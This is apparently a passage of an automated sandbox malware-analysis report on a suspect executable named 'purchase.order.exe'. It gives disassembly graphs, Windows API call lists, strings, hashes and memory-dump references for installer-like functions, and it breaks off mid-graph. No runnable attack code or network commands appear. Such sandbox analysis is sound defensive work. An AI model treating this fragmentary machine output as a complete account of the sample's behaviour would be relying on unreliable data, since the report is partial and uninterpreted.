                                          • API String ID: 1813718867-508498385
                                          • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                          • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                          • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                          • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
                                          Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 174 40580b-40580e 152->174 175 4057ef-405809 SendMessageW * 2 152->175 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 163 405917-40591d 158->163 164 40596b-40596f 158->164 161 405930-405939 call 404527 159->161 162 4058f7-405906 ShowWindow * 2 call 4044f5 159->162 171 40593e-405942 161->171 162->158 168 405945-405955 ShowWindow 163->168 169 40591f-40592b call 404499 163->169 164->161 166 405971-405977 164->166 166->161 176 405979-40598c SendMessageW 166->176 172 405965-405966 call 404499 168->172 173 405957-405960 call 4055c6 168->173 169->161 172->164 173->172 180 405810-40581c SendMessageW 174->180 181 40581e-405835 call 4044c0 174->181 175->174 182 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 176->182 183 405a8e-405a90 176->183 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188 4059d2-4059e7 TrackPopupMenu 182->188 189 4059bf-4059cf GetWindowRect 182->189 183->171 188->183 193 4059ed-405a04 188->193 189->188 194 40585a 190->194 195 40584d-405858 ShowWindow 190->195 191->183 192 405892-4058aa SendMessageW * 2 191->192 192->183 197 405a09-405a24 SendMessageW 193->197 196 405860-405866 call 4044f5 194->196 195->196 196->191 197->197 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 197->198 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 00405763
                                          • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                          • GetClientRect.USER32(?,?), ref: 004057AF
                                          • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                          • ShowWindow.USER32(?,00000008), ref: 00405852
                                          • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                          • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                            • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                          • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                          • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                          • ShowWindow.USER32(00000000), ref: 004058FE
                                          • ShowWindow.USER32(?,00000008), ref: 00405903
                                          • ShowWindow.USER32(00000008), ref: 0040594D
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                          • CreatePopupMenu.USER32 ref: 00405992
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                          • GetWindowRect.USER32(?,?), ref: 004059C6
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                          • OpenClipboard.USER32(00000000), ref: 00405A27
                                          • EmptyClipboard.USER32 ref: 00405A2D
                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                          • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                          • CloseClipboard.USER32 ref: 00405A88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                          • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                          • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                          • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68
                                          Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 667 406c5f-406c64 668 406cd5-406cf3 667->668 669 406c66-406c95 667->669 670 4072cb-4072e0 668->670 671 406c97-406c9a 669->671 672 406c9c-406ca0 669->672 676 4072e2-4072f8 670->676 677 4072fa-407310 670->677 673 406cac-406caf 671->673 674 406ca2-406ca6 672->674 675 406ca8 672->675 678 406cb1-406cba 673->678 679 406ccd-406cd0 673->679 674->673 675->673 680 407313-40731a 676->680 677->680 681 406cbc 678->681 682 406cbf-406ccb 678->682 683 406ea2-406ec0 679->683 684 407341-40734d 680->684 685 40731c-407320 680->685 681->682 688 406d35-406d63 682->688 686 406ec2-406ed6 683->686 687 406ed8-406eea 683->687 694 406ae3-406aec 684->694 689 407326-40733e 685->689 690 4074cf-4074d9 685->690 692 406eed-406ef7 686->692 687->692 695 406d65-406d7d 688->695 696 406d7f-406d99 688->696 689->684 693 4074e5-4074f8 690->693 699 406ef9 692->699 700 406e9a-406ea0 692->700 698 4074fd-407501 693->698 701 406af2 694->701 702 4074fa 694->702 697 406d9c-406da6 695->697 696->697 704 406dac 697->704 705 406d1d-406d23 697->705 721 407481-40748b 699->721 722 406e7f-406e97 699->722 700->683 703 406e3e-406e48 700->703 707 406af9-406afd 701->707 708 406c39-406c5a 701->708 709 406b9e-406ba2 701->709 710 406c0e-406c12 701->710 702->698 717 40748d-407497 703->717 718 406e4e-407017 703->718 727 406d02-406d1a 704->727 728 407469-407473 704->728 719 406dd6-406ddc 705->719 720 406d29-406d2f 705->720 707->693 714 406b03-406b10 707->714 708->670 712 406ba8-406bc1 709->712 713 40744e-407458 709->713 715 406c18-406c2c 710->715 716 40745d-407467 710->716 723 406bc4-406bc8 712->723 713->693 714->702 726 406b16-406b5c 714->726 729 406c2f-406c37 715->729 716->693 717->693 718->694 724 406e3a 719->724 725 406dde-406dfc 719->725 720->688 720->724 721->693 722->700 723->709 731 406bca-406bd0 723->731 724->703 732 406e14-406e26 725->732 733 406dfe-406e12 725->733 734 406b84-406b86 726->734 735 406b5e-406b62 726->735 727->705 728->693 729->708 729->710 736 406bd2-406bd9 731->736 737 406bfa-406c0c 731->737 738 406e29-406e33 732->738 733->738 741 406b94-406b9c 734->741 742 406b88-406b92 734->742 739 406b64-406b67 GlobalFree 735->739 740 406b6d-406b7b GlobalAlloc 735->740 743 406be4-406bf4 GlobalAlloc 736->743 744 406bdb-406bde GlobalFree 736->744 737->729 738->719 745 406e35 738->745 739->740 740->702 746 406b81 740->746 741->723 742->741 742->742 743->702 743->737 744->743 748 407475-40747f 745->748 749 406dbb-406dd3 745->749 746->734 748->693 749->719
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                          • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                          • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                          • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                          Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 786 40689e-4068b2 FindFirstFileW 787 4068b4-4068bd FindClose 786->787 788 4068bf 786->788 789 4068c1-4068c2 787->789 788->789
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                          • FindClose.KERNEL32(00000000), ref: 004068B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: X_B
                                          • API String ID: 2295610775-941606717
                                          • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                          • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                          • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                          • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                          Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 207 403fe5-403fee 203->207 205 404198-4041ad 204->205 206 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->206 211 4041ed-4041f2 call 40450c 205->211 212 4041af-4041b2 205->212 206->205 208 403ff0-403ffd SetWindowPos 207->208 209 404003-40400a 207->209 208->209 214 40400c-404026 ShowWindow 209->214 215 40404e-404054 209->215 219 4041f7-404212 211->219 217 4041b4-4041bf call 401389 212->217 218 4041e5-4041e7 212->218 220 404127-404135 call 404527 214->220 221 40402c-40403f GetWindowLongW 214->221 222 404056-404068 DestroyWindow 215->222 223 40406d-404070 215->223 217->218 243 4041c1-4041e0 SendMessageW 217->243 218->211 226 40448d 218->226 228 404214-404216 call 40140b 219->228 229 40421b-404221 219->229 233 40448f-404496 220->233 221->220 230 404045-404048 ShowWindow 221->230 231 40446a-404470 222->231 234 404072-40407e SetWindowLongW 223->234 235 404083-404089 223->235 226->233 228->229 240 404227-404232 229->240 241 40444b-404464 DestroyWindow EndDialog 229->241 230->215 231->226 239 404472-404478 231->239 234->233 235->220 242 40408f-40409e GetDlgItem 235->242 239->226 244 40447a-404483 ShowWindow 239->244 240->241 245 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 240->245 241->231 246 4040a0-4040b7 SendMessageW IsWindowEnabled 242->246 247 4040bd-4040c0 242->247 243->233 244->226 274 404287-40428c 245->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 245->275 246->226 246->247 249 4040c2-4040c3 247->249 250 4040c5-4040c8 247->250 252 4040f3-4040f8 call 404499 249->252 253 4040d6-4040db 250->253 254 4040ca-4040d0 250->254 252->220 255 404111-404121 SendMessageW 253->255 257 4040dd-4040e3 253->257 254->255 256 4040d2-4040d4 254->256 255->220 256->252 260 4040e5-4040eb call 40140b 257->260 261 4040fa-404103 call 40140b 257->261 270 4040f1 260->270 261->220 271 404105-40410f 261->271 270->252 271->270 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->219 294 404360-404362 283->294 294->219 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->231 299 4043a5-4043d2 CreateDialogParamW 296->299 297->226 298 40437a-404380 297->298 298->219 300 404386 298->300 299->231 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->226 301->226 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->231
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                          • ShowWindow.USER32(?), ref: 0040401D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                          • ShowWindow.USER32(?,00000004), ref: 00404048
                                          • DestroyWindow.USER32 ref: 0040405C
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                          • GetDlgItem.USER32(?,?), ref: 00404094
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                          • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                          • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                          • GetDlgItem.USER32(?,00000002), ref: 00404164
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                          • GetDlgItem.USER32(?,00000003), ref: 00404275
                                          • ShowWindow.USER32(00000000,?), ref: 00404296
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                          • EnableWindow.USER32(?,?), ref: 004042C3
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                          • EnableMenuItem.USER32(00000000), ref: 004042E0
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                          • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                          • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                          • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID:
                                          • API String ID: 121052019-0
                                          • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                          • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                          • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                          • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E
                                          Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 322 403c99-403cc2 call 403ee9 call 405f18 312->322 318 403c78-403c89 call 40640f 313->318 319 403c8e-403c94 lstrcatW 313->319 318->319 319->322 327 403d54-403d5c call 405f18 322->327 328 403cc8-403ccd 322->328 334 403d6a-403d8f LoadImageW 327->334 335 403d5e-403d65 call 40657e 327->335 328->327 329 403cd3-403cfb call 40640f 328->329 329->327 336 403cfd-403d01 329->336 338 403e10-403e18 call 40140b 334->338 339 403d91-403dc1 RegisterClassW 334->339 335->334 340 403d13-403d1f lstrlenW 336->340 341 403d03-403d10 call 405e3d 336->341 350 403e22-403e2d call 403ee9 338->350 351 403e1a-403e1d 338->351 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 339->342 343 403edf 339->343 347 403d21-403d2f lstrcmpiW 340->347 348 403d47-403d4f call 405e10 call 406541 340->348 341->340 342->338 346 403ee1-403ee8 343->346 347->348 354 403d31-403d3b GetFileAttributesW 347->354 348->327 362 403e33-403e4d ShowWindow call 4068c5 350->362 363 403eb6-403eb7 call 405699 350->363 351->346 357 403d41-403d42 call 405e5c 354->357 358 403d3d-403d3f 354->358 357->348 358->348 358->357 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->351 372 403ecc-403ed3 call 40140b 368->372 369->343 375 403e83-403ea6 DialogBoxParamW call 40140b 370->375 376 403e6d-403e7d GetClassInfoW RegisterClassW 370->376 371->370 372->351 380 403eab-403eb4 call 403b63 375->380 376->375 380->346
                                          APIs
                                            • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                            • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                          • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,774D3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\purchase.order.exe",00008001), ref: 00403C94
                                          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,774D3420), ref: 00403D14
                                          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                          • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                            • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                          • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                          • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                          • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                          • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-3536805133
                                          • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                          • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                          • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                          • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D
                                          Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 403 403225-403228 396->403 404 403278-40327d 396->404 400 403150-403159 call 4034be 398->400 401 40314e 398->401 408 40327f-403287 call 40303e 400->408 409 40315f-403166 400->409 401->400 406 40322a-403242 call 4034d4 call 4034be 403->406 407 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 403->407 404->388 406->404 430 403244-40324a 406->430 407->404 434 403289-40329a 407->434 408->404 412 4031e2-4031e6 409->412 413 403168-40317c call 405fec 409->413 417 4031f0-4031f6 412->417 418 4031e8-4031ef call 40303e 412->418 413->417 432 40317e-403185 413->432 425 403205-40320d 417->425 426 4031f8-403202 call 406a22 417->426 418->417 425->398 433 403213 425->433 426->425 430->404 430->407 432->417 436 403187-40318e 432->436 433->396 437 4032a2-4032a7 434->437 438 40329c 434->438 436->417 439 403190-403197 436->439 440 4032a8-4032ae 437->440 438->437 439->417 442 403199-4031a0 439->442 440->440 441 4032b0-4032cb SetFilePointer call 405fec 440->441 445 4032d0 441->445 442->417 444 